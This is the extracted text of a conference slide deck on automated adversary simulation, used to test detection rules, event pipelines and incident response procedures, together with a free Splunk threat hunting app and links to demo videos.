Demo 1: https://www.youtube.com/watch?v=cpnrCkj1308
Demo 2: https://www.youtube.com/watch?v=JmtjtiI3-fc
Demo 2 1/2: https://www.youtube.com/watch?v=KRdNbYbJSiI
Demo 3: https://www.youtube.com/watch?v=6gB-upKXTZ4
Automated adversary simulation is often perceived as a hard, dangerous and complicated program to implement and run. Fear no longer, our methodology and tooling will let you test and measure your defenses throughout your production environment to test not only your detection rule’s resilience but the whole event pipeline as well as your team’s response procedures. In this talk, we’ll share with the audience the open source tools we built and the methodology we use that will allow them to hit the ground running at nearly no cost.
4. ● You’ve spent a lot of money constructing a
solid defense program
● Ingesting, transforming and indexing
network/endpoint telemetry
● Buying all kinds of amazing tools: AI, ML, CTI,
etc
● Creating detection logic
● Takes effort to deploy a program but once
you deploy it ….
Detection Program
@olafhartong @mvelazco
6. ● How do you know if your event
pipeline is working?
● Did that GPO change last week break
anything in terms of security?
● Is that detection you’ve built last
year still working?
Problem Statement
● How do you know if your detection
vendor is doing what they are
supposed to?
● How can you convince your
stakeholders you’re in control?
● How do you know if your detection is
resilient ?
@olafhartong @mvelazco
9. What is it
● A valuable way to validate your
environment on a continuous basis
● It allows you to measure progress of
your effort
● It exposes unintended security
implications of an ever changing
environment
● A cost effective methodology
● Means to generate sample data
Automated attack simulation
What is it NOT
● Red team replacement
● Pentesting
● Skynet
● Impacting continuity (by design)
● The new holy grail or buzz
@olafhartong @mvelazco
11. Integration into your detection engineering process
1. Hypothesize
•Develop general theories
•Use Threat Intelligence, ATT&CK, Industry reports and
internal knowledge
•Develop interesting queries
•Determine timespan
2. Investigate & research
•Find ways how a technique can be executed,
scripts/samples/procedures
•Determine what data you will need
•Investigate what it looks like when the technique has
been executed
•Develop initial validation script options
3. Develop analytics
•Build a set of analytics
•Cast a wide net, then narrow it
•Be efficient
4. Analyze and implement
•Review results
•Enrich where possible
•Tune the query if needed, keep it
resilient
•Implement analytics in production
Implement validation script
5. Report and revise
•Report to IR/TI/Management
•Measure efficiency
•Measure scope
@olafhartong @mvelazco
12. End to end
Test your detection logic, data pipeline,
mitigations anywhere...in production
@olafhartong @mvelazco
13. ✘ A defensive capability
✘ Ideally, some knowledge of the
threats your company is facing
✘ Tools to execute and orchestrate
these crafted scenario’s
Requirements
✘ An adversarial mindset
✘ Management buy-in, or say sorry
later :)
✘ In case of a MSSP get their
involvement
✘
@olafhartong @mvelazco
24. Threat Hunting App
✘ Free Splunk application
✘ Very graphically oriented
✘ Built for threat hunting and
detection engineering
https://github.com/olafhartong/ThreatHunting
25. Threat Hunting App
✘ Loads of detections for attack
techniques within Windows
Environments
✘ Utilizes Sysmon and native
Windows Event log data
✘ MITRE ATT&CK focussed
✘ Goal:
Create an investigative
workflow for hunters and
provide as much context as
possible
https://github.com/olafhartong/ThreatHunting
36. Huge value in terms of control and
reportability
It does not have to be an expensive
program
Implementing a way of testing into your
detection engineering efforts
Takeaways
Use it for developing new detections or
improve your current analytics
It should not be a grading mechanism
@olafhartong @mvelazco